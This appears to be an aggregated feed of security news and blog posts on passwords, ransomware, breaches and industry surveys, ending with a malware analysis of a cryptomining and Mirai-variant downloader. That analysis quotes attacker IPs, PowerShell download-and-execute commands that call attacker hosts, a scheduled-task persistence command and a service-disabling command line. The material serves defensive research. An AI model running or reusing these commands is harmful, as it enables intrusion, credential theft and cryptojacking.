  • Use a password manager. Since it can be difficult to remember multiple complex passwords, use a password manager to keep track. With password managers, you’ll only need to remember one master password, in order to access the rest. Many password managers can also generate strong passwords to utilize when creating new logins.
  • Enable two or multi-factor authentication. Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification. This reduces the risk of successful impersonation by hackers.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Protect Your Digital Life: Why Strong Passwords Matter appeared first on McAfee Blogs.

Open source security: The risk issue is unpatched software, not open source use

Many of the trends in open source use that have presented risk management challenges to organizations in previous years persist today. However, new data also suggest that an inflection point has been reached, with many organizations improving their ability to manage open source risk, possibly due to heightened awareness and the maturation of commercial software composition analysis solutions. The 2019 Open Source Security and Risk Analysis (OSSRA) report, produced by the Synopsys Cybersecurity Research Center … More

The post Open source security: The risk issue is unpatched software, not open source use appeared first on Help Net Security.

Supply chain attacks: Mitigation and protection

In software development, a supply chain attack is typically performed by inserting malicious code into a code dependency or third-party service integration. Unlike typical cyber attacks, supply chain attacks provide two major advantages to attackers. Firstly, a single supply chain attack can target multiple companies at once (since multiple companies use the same code dependencies and third-party scripts); as such, the potential return of investment of the attack is higher. Secondly, and unlike common cyber … More

The post Supply chain attacks: Mitigation and protection appeared first on Help Net Security.

Inside the Government Cybersecurity Landscape: Federal vs. State Level Challenges

Few would dispute the idea that an effective cybersecurity profile requires candid assessments of potential vulnerabilities. Here’s a closer look at the challenges facing the federal cybersecurity mission and the efforts of state-level agencies. Federal Though the federal government demonstrates an ongoing commitment to ramping up its cybersecurity mission with annual spending in the tens […]… Read More

The post Inside the Government Cybersecurity Landscape: Federal vs. State Level Challenges appeared first on The State of Security.

Researchers develop cybersecurity system to test for vulnerabilities in technologies that use GPS

Southwest Research Institute has developed a cybersecurity system to test for vulnerabilities in automated vehicles and other technologies that use GPS receivers for positioning, navigation and timing. “This is a legal way for us to improve the cyber resilience of autonomous vehicles by demonstrating a transmission of spoofed or manipulated GPS signals to allow for analysis of system responses,” said Victor Murray, head of SwRI’s Cyber Physical Systems Group in the Intelligent Systems Division. GPS … More

The post Researchers develop cybersecurity system to test for vulnerabilities in technologies that use GPS appeared first on Help Net Security.

As organizations continue to adopt multicloud strategies, security remains an issue

97 percent of organizations are adopting multicloud strategies for mission-critical applications and nearly two-thirds are using multiple vendors for mission-critical workloads, a Virtustream survey reveals. The study, conducted by Forrester Consulting, is based on a global survey of more than 700 cloud technology decision makers at businesses with more than 500 employees. The study examines the current state of enterprise IT strategies for cloud-based workloads and details the increasing interest and needs of IT decision … More

The post As organizations continue to adopt multicloud strategies, security remains an issue appeared first on Help Net Security.

Security and compliance obstacles among the top challenges for cloud native adoption

Cloud native adoption has become an important trend among organizations as they move to embrace and employ a combination of cloud, containers, orchestration, and microservices to keep up with customers’ expectations and needs. To discover more about the motivations and challenges of companies adopting cloud native infrastructure, the O’Reilly “How Companies Adopt and Apply Cloud Native Infrastructure” report surveyed 590 practitioners, managers and CxOs from across the globe, and found that while nearly 70 percent … More

The post Security and compliance obstacles among the top challenges for cloud native adoption appeared first on Help Net Security.

Making the most of threat intelligence with threat intelligence gateways

Even though many security professionals are still dissatisfied with threat intelligence accuracy and quality, its use as a resource for network defense is growing. According to the 2019 SANS Cyber Threat Intelligence (CTI) Survey, the percentage of organizations that either produce or consume CTI has risen from 60 to 72 percent. As it gets more broadly adopted and as more organizations seek to operationalize their TI more effectively and efficiently, they are slowly starting to … More

The post Making the most of threat intelligence with threat intelligence gateways appeared first on Help Net Security.

Hacking our way into cybersecurity for medical devices

Hospitals are filled with machines connected to the internet. With a combination of both wired and wireless connectivity, knowing and managing which devices are connected has become more complicated and, consequently, the institutions’ attack surface has expanded. When did these devices get smart? A brief timeline shows the FDA didn’t start regulating the connectivity of devices until 2005, but medical devices started to leverage software back in the ‘80s. Clinical capabilities have benefited greatly from … More

The post Hacking our way into cybersecurity for medical devices appeared first on Help Net Security.

SEC demands better disclosure for cybersecurity incidents and threats

As companies increasingly rely on networked systems and on the Internet, cybersecurity threats have grown. Companies that fall victim to a successful cyberattack incur substantial costs for remediation, including increased costs for cyber protection, lost revenues, legal costs and more. All of these costs can impact the riskiness and value of a public company’s stock. Given the frequency, magnitude and cost of cybersecurity incidents, the Securities and Exchange Commission (SEC) has stated that it is … More

The post SEC demands better disclosure for cybersecurity incidents and threats appeared first on Help Net Security.

Companies face regulatory fines and cybersecurity threats, still fail to protect sensitive data

22% of a company’s folders are accessible, on average, to every employee, according to the new report from the Varonis Data Lab, which analyzed more than 54 billion files. The report shines a light on security issues that put organizations at risk from data breaches, insider threats and crippling malware attacks. Key findings from the 2019 Global Data Risk Report include: Out-of-control permissions expose sensitive files and folders to every employee: 53% of companies had … More

The post Companies face regulatory fines and cybersecurity threats, still fail to protect sensitive data appeared first on Help Net Security.

Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed

Logging onto a free Wi-Fi network can be tempting, especially when you’re out running errands or waiting to catch a flight at the airport. But this could have serious cybersecurity consequences. One popular Android app, which allowed anyone to search for nearby Wi-Fi networks, was recently left exposed, leaving a database containing over 2 million network passwords unprotected.

How exactly were these passwords exposed? The app, which had been downloaded by millions of users, allowed anyone to search for Wi-Fi networks in their area. The app also lets users upload their Wi-Fi network passwords from their devices to its database for others to use. When the database was left exposed and unprotected, anyone could access and download its contents. Each record in the database contained the Wi-Fi network name, its precise geolocation, its basic service set identifier, and the network password in plaintext. Because the app didn’t require users to obtain permission from the network owner, it would be quite easy for a cybercriminal to modify router settings and point unsuspecting users to malicious websites. What’s more, a threat actor could also read unencrypted traffic that goes across a wireless network, allowing them to steal passwords and private data.

Thankfully, the web host was able to take down the database containing the Wi-Fi passwords within a day of being notified. But it’s important for users to be aware of the cybersecurity implications that free or public Wi-Fi presents. Check out the following tips to help protect your data:

  • Change your Wi-Fi password. If you think your password may have been affected by this exposure, err on the side of caution and reset it. Be sure to make your new password complex and unique.
  • Keep your network password private. Wi-Fi networks could be susceptible to a number of threats if their passwords are left in the wrong hands. Only share your passwords with family, friends, and those you trust, and never upload your password to a public database for strangers to use.
  • Safeguard your online privacy. Use a security solution like McAfee Safe Connect to encrypt your online activity, protect your privacy by hiding your IP address, and better defend against cybercriminals.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed appeared first on McAfee Blogs.

What This Report on Cyber Risk Gets Wrong

The Marsh brokerage unit of Marsh and McLennan recently announced a new evaluation process called Cyber Catalyst designed to determine the usefulness of enterprise cyber risk tools.

The goal of the new offering is to identify and implement industry-wide standards to help cyber insurance policyholders make more informed decisions about cyber-related products and services; basically, what works and what doesn’t. Other major insurers participating in Cyber Catalyst include Allianz, AXA XL, AXIS, Beazley, CFC, and Sompo International.

While this collaboration between insurance companies is unusual, it’s not entirely surprising. Cyber insurance is a $4 billion market globally. While it’s difficult to accurately gauge how many hacking attempts were successfully foiled by the products targeted here, data breaches and cyber attacks on businesses continue to increase in frequency and severity. The 2019 World Economic Forum’s Global Risks Report ranks “massive data fraud and theft” as the fourth greatest global risk, followed by “cyber-attacks” in the five slot.

Meanwhile, cybersecurity products and vendors have been, to be charitable, a mixed bag.

Good in Theory

From this standpoint, Cyber Catalyst seems like not just a good idea, but an obvious one. A standardized metric to determine which cybersecurity solutions are no better than a fig leaf and which ones provide real armor to defend against cyberattacks is sorely lacking in the cybersecurity space. By Marsh’s own estimates, there are more than three thousand cybersecurity vendors amounting to a $114 billion marketplace. Many of them don’t inspire confidence on the part of businesses.

Insurers have a vested interest in determining the effectiveness of cybersecurity products, weeding out buggy software and promoting effective solutions that can help address risk aggregation issues. Businesses and their data are in turn better protected, and at least in theory, they would pay less for coverage. Everyone wins.

Insurance companies did something similar in the 1950s with the creation of the Insurance Institute for Highway Safety. In the face of rising traffic collisions and fatalities, the insurance industry collaborated to establish a set of tests and ratings for vehicles, and the result has been a gold standard for automotive safety for decades. Using a similar strategy for cybersecurity would at least in theory help mitigate the ever-increasing costs and risks to companies and their data.

Or Maybe Not

Where the analogy to the Insurance Institute for Highway Safety breaks down is here: The threats to car drivers and passengers have ultimately stayed the same since its inception. Everything we’ve learned over the years about making cars has progressively led to safer vehicles. Information technology is vastly different in that iterative improvements in one specific area doesn’t necessarily make an organization as a whole safer or better protected against cyber threats–in fact sometimes it can have the opposite effect when a new feature added turns out to be a bug.

Cyber defenses are meaningless in the presence of an unintended, yet gaping, hole in an organization’s defenses. Then there is the march of sound innovation. Products that provided first-in-class protection for a business’s network a few years ago may no longer be so great where cloud computing and virtual servers, or BYOD are concerned. The attackable surface of every business continues to increase with each newly introduced technology, and it seems overly optimistic to assume the standard evaluation process (currently twice a year) would be able to keep pace with new threats.

There’s also the risk of putting too many eggs into one basket. While the diffuse nature of the cybersecurity market causes headaches for everyone involved, establishing a recommended solution or set of solutions effectively makes them an ideal target for hackers. While it’s important to keep consumers and businesses informed of potential risk to their information, cybersecurity issues require a certain amount of secrecy until they have been properly addressed. Compromising, or even identifying and reporting on a vulnerability before it’s been patched in an industry standard security product, process or vendor practice could cause a potentially catastrophic chain reaction for cyber insurers and their clients.

Culture Eats Strategy for Breakfast

Where the Cyber Catalyst program seems to potentially miss the mark is by overlooking the weakest link in any company’s security (i.e., its users). An advanced cybersecurity system or set of tools capable of blocking the most insidious and sophisticated attack can readily be circumvented by a spear phishing campaign, a compromised smartphone, or a disgruntled employee. Social engineering cannot be systematically addressed. Combatting the lures of compromise requires organizations to foster and maintain a culture of privacy and security.

The risk of employee over-reliance on tools and systems at the expense of training, awareness, and a company culture where cybersecurity is front and center must not be underestimated. While it is easier to opt for the quick and easy approach of purchasing a recommended solution, companies still need a comprehensive and evolving playbook to meet the ever-changing tactics of persistent, sophisticated and creative hackers.

While industry-wide cooperation may be a good thing, it’s vital for companies and insurers alike to recognize that any security program or service is fallible. Without an equal investment in functional cybersecurity, which places as much store in training employees and keeping aware of new threats, the rise in breaches and compromises will continue.

This article originally appeared on Inc.com.

The post What This Report on Cyber Risk Gets Wrong appeared first on Adam Levin.

Attackers breached Docker Hub, grabbed keys and tokens

Docker, the company behing the popular virtualization tool bearing the same name, has announced late on Friday that it has suffered a security breach. There was no official public announcement. Instead, the company sent an alert to potentially affected customers and urged them to change their passwords check their security logs. What happened? “On Thursday, April 25th, 2019, we discovered unauthorized access to a single Hub database storing a subset of non-financial user data,” the … More

The post Attackers breached Docker Hub, grabbed keys and tokens appeared first on Help Net Security.

Beware of 10 Past Ransomware Attacks

One of the biggest malware threats of 2018 was Ransomware, and it continues to disrupt businesses and daily lives of individuals across the world. In 2019 ransomware has taken a new form – security experts believe that researchers have noted thousands of different ransomware variants looming large on the internet. ransomware is becoming more sophisticated and the variants are only growing.

We list here some of the most notorious and popular ransomware attacks, as they made waves in the cybersecurity industry over the years.

1. LockerGoga

After an initial infection at the French engineering consulting firm Altran in 2019, it went on to hit several industrial and manufacturing firms, including Norsk Hydro.

LockerGoga is the most destructive type of ransomware, and it appears to have both ransomware and wiper capabilities. The latest variant has a very different approach from typical ransomware, it forcibly logs victims off the infected device. This results in the victim not being able to see the ransom instructions on how to recover files.

2. Bad Rabbit

This malware disguises itself as an Adobe Flash installer and spreads via ‘drive-by download’ on compromised websites. The Bad Rabbit ransomware attack follows the wider-reaching NotPetya strains of malicious code and has infected organizations in Eastern Europe and Russia. Using JavaScript the Flash download is injected into the HTML or Java files of the affected websites, and when a user clicks on the malicious installer, the computer locks.

3. Cerber

An “affiliate program” of sorts for cybercriminals server is distributed as ransomware-as-a-service (RaaS). In exchange for 40 percent of the profits, anyone can buy it and unleash it.

Cerber uses an elaborate phishing campaign and also targets cloud-based Office 365 users. Typically, the victim receives an email with an infected MS Office document attached. Once opened, the ransomware runs silently in the background. As the encryption takes place it provides no indication of infection to the user. After the encryption, the user will find ransom notes in encrypted folders. Cerber accounted for 26% of all ransomware infections in 2017.

4. Dharma

Dharma first struck the world in 2016 and is releasing new versions regularly. The latest variants of 2019 have file extensions .gif .AUF, USA, .xwx, .best, and .heets. It uses cryptovirus that uses contact email and random combinations of letters to mark encrypted files.

5. GandCrab

Considered to be the most popular multi-million dollar ransomware of 2018, GandCrab relies heavily on Microsoft Office macros, VBScript, and PowerShell to avoid detection. One of the few widely deployed ransomware campaigns it uses a ransomware-as-a-service model to maximize delivery. GandCrab infected over 48,000 nodes within a month and was first reported at the end of January 2018.

6. Jigsaw

Named after a horror movie character, it not only encrypts user’s files, but also deletes them, so it’s particularly a sadistic kind of ransomware. So if one is infected with Jigsaw, he should react quickly. They have a deadline for 24-hours to pay the ransom. If they fail to meet the deadline, the ransomware starts deleting the files. Try shutting down the computer and the Jigsaw deletes up to 1,000 of the victim’s files.

7. Katyusha

Katyusha was first detected in October 2018. It is an encryption ransomware Trojan encrypts files, adding the extension. Katyusha releases the data to public download if the ransom is not paid. The malware package contains EternalBlue and DoublePulsar exploits which are used to spread over the network. It also deletes shadow copies from the system. Katyusha ransomware is commonly delivered to victims via malicious email attachments. Currently, there are no tools capable of cracking Katyusha’s encryption and restoring data free of charge.

8. SamSam

SamSam is most commonly in targeted ransomware attacks. SamSam has attacked a wide range of industries in the US, mainly critical infrastructure, such as hospitals, healthcare companies, and city municipalities. Last year, SamSam attack crippled the city of Atlanta for days and cost taxpayers close to $17 million.

Unlike most ransomware campaigns SamSam relies on phishing techniques for delivery and uses Remote Desktop Protocol (RDP) to infect victims’ to avoid detection.

9. PewCrypt

This ransomware is not for money, they only want the victims to subscribe to the popular YouTuber PewDiePie, and help him reach 100m subscribers, to beat Indian Bollywood channel, T-Series. The competition between them has been on for several months. PewDiePie fans believe that having ransomware is the best way to rake support for their idol. PewDiePie, on the other hand, has not endorsed this move to use malicious tactics to keep him at the top.

PewCrypt comes with spam email campaigns and websites that host malware or display malicious advertisements.

10. Ryuk

Debuted in August 2018 Ryuk is part of a new ransomware family, and has made $3.7 million in bitcoin, across 52 payments. Normally, ransomware is distributed via spam campaigns and exploit kits, but Ryuk is used in targeted attacks. It mainly focuses on the big organization that can pay a lot of money to recover their files. Ryuk demand ransoms ranging from 15 to 50 bitcoins, and it uses robust military algorithms such as ‘RSA4096’ and ‘AES-256’ to encrypt files and.

When Ryuk ransomware first appeared in 2018, researchers felt it was related to the North Koreans. Close scrutiny, it was found that Ryuk has its roots in Russia and they had built Ryuk ransomware using Hermes code.

Can Ransomware be preventable!

Even though there are ways to recover encrypted files with a decryptor, but new tools and ransomware variants are making it difficult to keep up with the pace. The best way to handle ransomware is prevention – follow the best practices in network security like; regular update backups, and not downloading suspicious attachments.

Related Resources:

Fileless Ransomware: The Next Big Threat For The US In The Waiting

How to Remove Pewcrypt Ransomware

Ryuk Ransomware – Too Early to Predict The Actors

Bad Actors Still Raking Profit From Ransomware

The post Beware of 10 Past Ransomware Attacks appeared first on .

GE trade secret theft case demonstrates need for document behavior monitoring

A former GE engineer and a Chinese national have been formally charged with 14 counts of economic espionage by the U.S. Department of Justice after stealing trade secrets from GE. The indictment describes the calculated theft of sensitive documents related to the proprietary design of GE’s gas and steam turbines. According to the unsealed indictment, the engineer at GE Power & Water in Schenectady, New York “exploited his access to GE’s files by stealing multiple … More

The post GE trade secret theft case demonstrates need for document behavior monitoring appeared first on Help Net Security.

The leading sources of stress for cybersecurity leaders? Regulation, threats, skills shortage

A perfect storm of regulation, increased threats and technological complexity is overwhelming cybersecurity decision makers, reveals new research from Symantec. Cybersecurity suffers from information overload Four in five (82 percent) security leaders across France, Germany and the UK report feeling burned out, whilst just under two-thirds (63 percent) think about leaving the industry or quitting their job (64 percent). Surveying 3,045 cybersecurity decision makers across the across France, Germany and the UK, the research – … More

The post The leading sources of stress for cybersecurity leaders? Regulation, threats, skills shortage appeared first on Help Net Security.

Most SMBs would pay a ransom in order to recover stolen data

More than half (55 percent) of executives at SMBs said they would pay hackers in order to recover their stolen data in ransomware attacks, according to the second quarterly AppRiver Cyberthreat Index for Business Survey. That number jumps to 74 percent among larger SMBs that employ 150-250 employees, with nearly 4 in 10 (39 percent) going as far as saying they “definitely would pay ransom at almost any price” to prevent their data from being … More

The post Most SMBs would pay a ransom in order to recover stolen data appeared first on Help Net Security.

What Can League of Legends Teach Us About Cybersecurity?

The League of Legends game and human psychology are two things we don’t often associate with cybersecurity. As an avid gamer, I encountered and observed many parallels between the tactics used to win games like League of Legends and the mentality that guides human behavior in general. Thus, when I began teaching security awareness and […]… Read More

The post What Can League of Legends Teach Us About Cybersecurity? appeared first on The State of Security.

Security Affairs newsletter Round 211 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

60 Million records of LinkedIn users exposed online
INPIVX hidden service, a new way to organize ransomware attacks
Ride-Hailing Company operating in Iran exposes data of Iranian Drivers
A flaw in Shopify API flaw exposed revenue and traffic data of thousands of stores
Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT
jQuery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites
Russian Twitter bot activity increased in the wake Mueller report release
Bodybuilding.com forces password reset after a security breach
EmCare reveals patient and employee data were hacked
FireEye experts found source code for CARBANAK malware on VirusTotal
Iran-linked APT34: Analyzing the webmask project
Targeted Attacks hit multiple embassies with Trojanized TeamViewer
Kaspersky speculates the involvement of ShadowPad attackers in Operation ShadowHammer
OilRig APT uses Karkoff malware along with DNSpionage in recent attacks
Stuart City is the new victim of the Ryuk Ransomware
The Russian Shadow in Eastern Europe: Gamaredon ‘s Ukrainian MOD Campaign
Zero-day vulnerability in Oracle WebLogic
A flaw in Rockwell Controller allows attackers to redirect users to malicious Sites
Britain ‘Approves Huawei role in building ‘non-core parts for 5G Network
Crooks abuse GitHub platform to host phishing kits
Flaws in Social Warfare plugin actively exploited in the wild
Beapy Cryptojacking campaign leverages EternalBlue exploit to spread
Millions of IoT Devices exposed to remote hacks due to iLnkP2P flaws
The strengths and weaknesses of different VPN protocols
Cisco discovered several flaws in Sierra Wireless AirLink ES450 devices
Docker Hub Database hacked, 190,000 users impacted
Experts release PoC exploit for unpatched flaw in WordPress WooCommerce Extension
Magecart skimmer scripts hosted on GitHub infected 200+ e-commerce sites

Pierluigi Paganini

(SecurityAffairs – newsletter, cybersecurity)

The post Security Affairs newsletter Round 211 – News of the week appeared first on Security Affairs.

Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’

strong password

strong passwordAs adults, we know the importance of strong passwords, and we’ve likely preached the message to our kids. But let’s rewind for a minute. Do our kids understand why strong passwords are important and why it needs to become a habit much like personal health and hygiene?

If we want the habit to stick, the reason why can’t be simply because we told them so. We’ve got to make it personal and logical.

Think about the habits you’ve already successfully instilled and the reasoning you’ve attached to them.

Brush your teeth to prevent disease and so they don’t fall out.
Eat a balanced diet so you have fuel for the day and to protect yourself from illness and disease.
Get enough sleep to restore your body and keep your mind sharp for learning.
Bathe and groom to wash away germs (and to keep people from falling over when you walk by). 

The same reasoning applies to online hygiene: We change our passwords (about every three months) to stay as safe as possible online and protect what matters. When talking to kids, the things that matter include our home address, our school name, our personal information (such as a parent’s credit card information, our social security number, or other account access).

Kids Targeted

We falsely believe that an adult’s information is more valuable than a child’s. On the contrary, given a choice, 10 out of 10 hackers would mine a child’s information over an adult’s because it’s unblemished. Determined identity thieves will use a child’s Social Security number to apply for government benefits, open bank, and credit card accounts, apply for a loan or utility service or rent an apartment. Also, once a child’s information is hacked, a thief can usually get to a parent’s information.

How to Stay Safe

It’s a tall task to prevent some of the massive data breaches in the news that target kids’ information. However, what is in our control, the ability to practice and teach healthy password habits in our home.

Tips for Families

strong passwordShake it up. According to McAfee Chief Consumer Security Evangelist Gary Davis, to bulletproof your passwords, make sure they are at least 12 characters long and include numbers, symbols, and upper and lowercase letters. Consider substituting numbers and symbols for letters, such as zero for “O” or @ for “A”.

Encourage kids to get creative and create passwords or phrases that mean something to them. For instance, advises Gary, “If you love crime novels you might pick the phrase: ILoveBooksOnCrime
Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as 1L0VEBook$oNcRIM3!”

Three random words. Password wisdom has morphed over the years as we learn more and more about hacking practices. According to the National Cyber Security Centre, another way to create a strong password is by using three random words (not birthdates, addresses, or sports numbers) that mean something to you. For instance: ‘lovepuppypaws’ or ‘drakegagacardib’ or ‘eatsleeprepeat’ or ‘tacospizzanutella’.

More than one password. Creating a new password for each account will head off cybercriminals if any of your other passwords are cracked. Consider a password manager to help you keep track of your passwords.

Change product default passwords immediately. If you purchase products for kids such as internet-connected gaming devices, routers, or speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

When shopping online, don’t save info. Teach kids that when shopping on their favorite retail or gaming sites, not to save credit card information. Saving personal information to different accounts may speed up the checkout process. However, it also compromises data.

Employ extra protection. Comprehensive security software can protect you from several threats such as viruses, identity theft, privacy breaches, and malware designed to grab your data. Security software can cover your whole family as well as multiple devices.

Web Advisor. Keep your software up-to-date with a free web advisor that helps protect you from accidentally typing passwords into phishing sites.

strong password

Use unique passwords and MFA. This is also called “layering up.” 1) Use unique passwords for each of your accounts. By using different passwords, you avoid having all of your accounts become vulnerable if you are hacked (think domino effect). 2) MFA is Multi-Factor Authentication (also called two-step verification or authentication ). MFA confirms a user’s identity only after presenting two or more pieces of evidence. Though not 100% secure, this practice adds a layer of security to an account.

Keep it private. Kids love to show one another loyalty by sharing passwords and giving one another access to their social network accounts. DO NOT encourage this behavior. It’s reckless and could carry some serious privacy consequences. (Of course, sharing with parents, is recommended).

Credential Cracking

According to the Identity Theft Resource Center® (ITRC), the reported number of consumer records exposed containing sensitive personally identifiable information jumped 126 percent in 2018. The report explicitly stated password cracking as an issue: “The exploitation of usernames and passwords by nefarious actors continues to be a ripe target due to the increase in credential cracking activities – not to mention the amount of data that can be gleaned by accessing accounts that reuse the same credentials.”

May 2 is World Password Day and the perfect time to consider going over these password basics with your family.

The post Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’ appeared first on McAfee Blogs.

Miners snatching open source tools to strengthen their malevolent power!

Estimated reading time: 10 minutes

From the last one year, Quick Heal Security Labs has been observing a boost in the number of mining malware. One of the ways to earn cryptocurrencies is to mine them. Nowadays cryptocurrency miner malware have become hot attack vectors for cybercriminals due to its ease of deployment and instant return on investments. We usually observe that such miners come with different techniques to deliver it to a victim. Attacker can download original open source software and slightly modify them rather than completely writing their own module.

In this blog post, we would talk about couple of cases where attack scenario is built on top of these open source tools. We would also talk about how the trend of abusing open source tools for building new malware is helping malware authors.

The trend is observed especially in cryptojacking cases. Though cryptojacking is a direct source of income for cybercriminals, stolen information from the victim’s systems can yield additional money for cybercriminals. So, these open source tools are used for various purposes like downloading frameworks, information stealing, crypto-mining, DNS Changer, Mirai bot and many more. This helped a lot to form a botnet of similar hosts to produce more hashes per second. Often such open source tools are easily available on Github and similar platforms. We can classify them as exploit frameworks, vulnerability scanners, password stealer, privilege elevators, evaders, etc.


Infection vector:

We received a miner downloader which downloads multiple components of the attack. This script may come to your system through spam mails, malicious URLs, free software bundler or any conventional method that is being used by all the malware variants. Also, we suspect that a powershell script seems to be the initial culprit. The behavior of the miner is a bit recursive in nature so we could not confirm its initial trace in the system.


Technical Analysis:

Fig. 1 Working of miner

The miner downloader creates a file named as ‘xpdown.dat’ which contains some IP addresses of C2 servers from where it downloads further components.

45.58.135.106
103.95.28.54
103.213.246.23
74.222.14.61
Ok.xmr6b.ru

It then downloads the following files from the domains:

hxxp://45.58.135.106/xpdown.dat
hxxp://45.58.135.106/down.html
hxxp://45.58.135.106/ok/64.html

It contains the IP which downloads the CPU Miner (174.128.248.10)

hxxp://45.58.135.106/kill.txt

It contains the following list of process to kill if it was running on victim machine.

lsmose.exe                            lsmos.exe                         conime.exe                            lsmosee.exe
1.exe                                      lsazs.exe                           tasksche.exe                          Zationa.exe
csrs.exe                                 shennong.bat                  svshpst.exe                            Spoolvs.exe
svchsot.exe                           xmrig.exe                        srvany.exe                              WinSCV.exe
csrswz.exe                            csrs.exe                              seser.exe                                severxxs.exe
mssecsvc.exe                       mssecsvr.exe                    dsbws.exe


Then malware downloads a text file which contains the information of multiple payloads to be downloaded.

hxxp://45.58.135.106/down.txt

And this down.txt contains the following links. The malware then opens a TCP port 32381 on the system.

hxxp://213.183.45.201/downs.exe              (C:\windows\system\downs.exe)
hxxp://66.117.6.174/ups.rar                         (C:\windows\system\cab.exe)
hxxp://213.183.60.7/b.exe                            (C:\windows\inf\msief.exe)
hxxp://174.128.239.250/item.dll                 (C:\windows\debug\item.dat)

Looking at the links in the file we observed following things.

Downs.exe is a modified version of Microsoft “CACLS” (Which displays and modifies the access control list). Ups.rar is downloaded as cab.exe. This component is a downloader for windows variant of Mirai botnet. This also acts as a DNS Changer and opens a backdoor in the system. On execution, it performs multiple operations like modifying the DNS entry in the host with IP “223.5.5.5” which has the Geo location in China and ISP of DNS is “Hangzhou Alibaba Advertising Co.,Ltd.”

 

Fig. 2 Window Server Check

 

Then it checks whether the compromised machine is a window server or not by calling GetVersionExA. It downloads update.txt from C2 server, if the machine is server, and drops at “C:\windows\system\uplist.txt”. The uplist.txt contains the following payload to be downloaded and executed.

hxxp://66.117.6.174/wpd.jpg                     (C:\windows\system\msinfo.exe)
hxxp://66.117.6.174/my1.html                   (C:\windows\system\my1.bat)

It also downloads npptools.dll, 64npf.sys, npf.sys, nsoak.dat, packet.dll and wpcap.dll. These are files used for network packets processing loaded by msinfo.exe during its execution.

Let’s look into these components one by one.

my1.bat:

It contains the code which is very stealthy and evasive as it uses several techniques such as “Squiblydoo”, “download cradle” and WMI Event Subscription persistence exploit to run malicious content on infected machines.

The WMI script contains multiple PowerShell scripts.

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp://173.208.139.170/s.txt’)

This text file contains another PowerShell downloader as follows:

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp://74.222.1.38/up.txt’)

“Up.txt” contains the code which collects information regarding System OS, Physical Memory, List of running processes using WMI classes and then downloads Powershell format of Mimikatz from Github.

Further it steals the credentials from the compromised machine and uploads it to the FTP server IP:192.187.111.66 with hard coded credential of FTP.

Fig. 3 Victims Data in FTP Server.

Msinfo.exe:

 It is basically a windows version of Mirai botnet. As more of its code matches with Mirai source code which was leaked previously. Upon execution with command line parameters “-create” “-run”, it checks the architecture of the current system whether it is x86, MIPS, ARM etc. Based on the identification, it will check for its latest update and download if available.

It performs the following task as per an encrypted file downloaded from C2 server.

  1. Implements spreader mechanism by performing in the form of blind SQLi (sql injection), brute force techniques by using crack library and hydra tool.
              [Cracker:Telnet][Cracker:MSSQL] [Cracker:CCTV][Cracker:MS17010], CrackerWMI, CrackerSSH
  1. It scans various ports such as 80,8000,445 using masscan (a very fastport scanner an open source project) which operates similar to nmap , the popular port scanning tool.
              https://github.com/robertdavidgraham/masscan
  1. Disable specific services by invoking the following command:
              C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm
              start= disabled&sc stop NlaSvc&sc config     NlaSvc start=disabled
  1. It also performs network scan for which it collects the Public/Private IP of the system and all the  associated information such as Geo Location etc. Then attacker spoofs his own IP against the current system IP and using masscan it performs scanning of other devices.

By these steps it converts this system into a bot and adds to their bot network. Its code has been developed in C++ and distributed across many sources like-

CheckUpdate.cpp
Cracker_Inline.cpp
Cracker_Standalone.cpp
CThreadPool.cpp
Logger_Stdout.cpp
Scanner_Tcp_Connect.cpp
Scanner_Tcp_Raw.cpp
cService.cpp
ServerAgent.cpp
Task_Crack_Ipc.cpp
Task_Crack_Mssql.cpp
Task_Crack_Rdp.cpp
Task_Crack_Ssh.cpp
Task_Crack_Telnet.cpp
Task_Crack_Wmi.cpp
Task_Scan.cpp WPD.cpp

It basically targets IoT devices which contain embedded Linux. So it has used BusyBox (a software suite that provides UNIX utilities also called as Swiss Army Knife of embedded Linux) for executing remote commands after compromising/cracking those devices through various ways mentioned above.


VBS/BAT Agent For Download Miner:

First the payload will be dropped and executed on the below location in the victim machine.

hxxp://213.183.60.7/b.exe                      ( downloaded at C:\windows\inf\msief.exe)

On execution, it will drop the VBS and batch file in the below mentioned location and execute the vbs file by invoking wscript.exe which eventually execute the bat file.

C:\Windows\web\c3.bat
C:\Windows\web\n.vbs

The bat file contains a lot of code, which will modify attributes of some folder/files, kill some specific processes, delete some files, modifies the access control of some folder/files, make persistent for multiple payload in the system via registry, task scheduler, WMI Event subscription and also modifies the firewall policy by blocking 445,139 ports.

 

Fig. 4 Part of C3.bat code

There are also two more additional payloads which are downloaded from one of C2 server present in xpdown.dat; one is a diskwritter, a DLL file , dropped at “C:\Windows\debug” location. It will execute on system start as it has an entry in task scheduler added by the above bat file.

schtasks /create /tn “Mysa1” /tr “rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa” /ru “system”  /sc onstart /F

And the second one is the final payload i.e. XMRig Monero Miner, a 64 bit executable downloaded from hxxp://174.128.248.10/64.rar at “C:\windows\debug\lsmos.exe”

On execution, it unpacks itself and drops 3 files on the current execution folder, one is an executable (lsmose.exe -64 bit packed with VM Protect) file and two DLLs (xmrstak_cuda_backend.dll and xmrstak_opencl_backend.dll), which helps miner for successful execution.

One more similar case we have observed, a base64 encoded PowerShell script which is basically a cryptomining malware hiding in WMI class to evade AV and most of the security product due to its stealthy and unique feature.

After decoding we get the following code:

Fig. 5 Base64 Decoded script

 

Following is basic workflow of the malware.

Fig. 6 Basic workflow of miner with WMI class

